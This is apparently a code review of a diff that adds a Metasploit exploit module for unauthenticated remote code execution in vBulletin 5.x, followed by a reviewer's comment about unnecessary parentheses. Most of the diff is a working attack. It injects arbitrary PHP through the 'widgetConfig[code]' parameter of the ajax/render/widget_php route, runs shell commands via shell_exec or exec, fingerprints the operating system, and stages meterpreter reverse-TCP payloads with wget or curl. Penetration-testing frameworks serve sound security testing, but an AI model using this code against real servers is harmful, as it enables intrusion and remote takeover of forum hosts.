modules/exploits/multi/http/vbulletin_5x_unauth_rce.rb

```diff
@@ -0,0 +1,189 @@
+      'Platform' => ['linux', 'php', 'unix', 'windows'],
+      'Arch' => [ARCH_CMD, ARCH_PHP, ARCH_X86, ARCH_X64],
+      'Privileged' => true,
+      'Targets' => [
+        ['Automatic (Dropper)',
+          'Platform' => 'php',
+          'Arch' => [ARCH_PHP],
+          'Type' => :php_dropper,
+          'DefaultOptions' => {
+            'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+          }
+        ],
+        ['Linux (Stager)',
+          'Platform' => 'linux',
+          'Arch' => [ARCH_X86, ARCH_X64],
+          'Type' => :linux_stager,
+          'CmdStagerFlavor' => ['wget', 'curl'],
+          'DefaultOptions' => {
+            'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
+            'CMDSTAGER::FLAVOR' => 'wget'
+          }
+        ],
+        ['Windows (Stager)',
+          'Platform' => 'windows',
+          'Arch' => [ARCH_X86, ARCH_X64],
+          'Type' => :windows_stager,
+          'DefaultOptions' => {'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'}
+        ],
+        ['Unix (In-Memory)',
+          'Platform' => 'unix',
+          'Arch' => ARCH_CMD,
+          'Type' => :unix_memory,
+          'DefaultOptions' => {
+            'PAYLOAD' => 'cmd/unix/generic'
+          }
+        ],
+        ['Windows (In-Memory)',
+          'Platform' => 'windows',
+          'Arch' => ARCH_CMD,
+          'Type' => :windows_memory,
+          'DefaultOptions' => {
+            'PAYLOAD' => 'cmd/windows/generic'
+          }
+        ],
+      ],
+      'DefaultTarget' => 0,
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'Reliability' => [REPEATABLE_SESSION],
+        'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+      }
+    ))
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'The URI of the vBulletin base path', '/']),
+      OptEnum.new('PHP_CMD', [true, 'Specify the PHP function in which you want execute the payload.', 'shell_exec', ['shell_exec', 'exec']])
+    ])
+  end
+
+  def execute_command(command, _opts = {})
+    response = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path),
+      'encode_params' => true,
+      'vars_post' => {
+        'routestring' => 'ajax/render/widget_php',
+        'widgetConfig[code]' => "echo #{datastore['PHP_CMD']}('#{command}'); exit;"
+      }
+    })
+    if (response) && (response.body)
+      return response
+    end
+
+    return false
+  end
+
+  def get_os
+    received = execute_command('echo $PATH')
+    ## Not linux, check Windows.
+    if(received.body.include?('$PATH'))
+      received = execute_command('echo %PATH%')
+    end
+
+    os = false
+    if(received.body =~ /^\//)
+      os = 'linux'
+    elsif(received.body =~ /^[a-zA-Z]:\\/)
+      os = 'windows'
+    end
+
+    return(os)
+  end
+
+  def check
+    rand_str = Rex::Text.rand_text_alpha(8)
+    received = execute_command("echo #{rand_str}")
+    if (received) && (received.body.include?(rand_str))
```

Comment:
In general there are lots of not needed parenthesis in this code.
This for example could be
```
    if received && received.body.include?(rand_str)
      return Exploit::CheckCode::Vulnerable
    end
```

Which cuts out 2, saving 4 characters.  I would recommend going back over the code and seeing where you could drop them.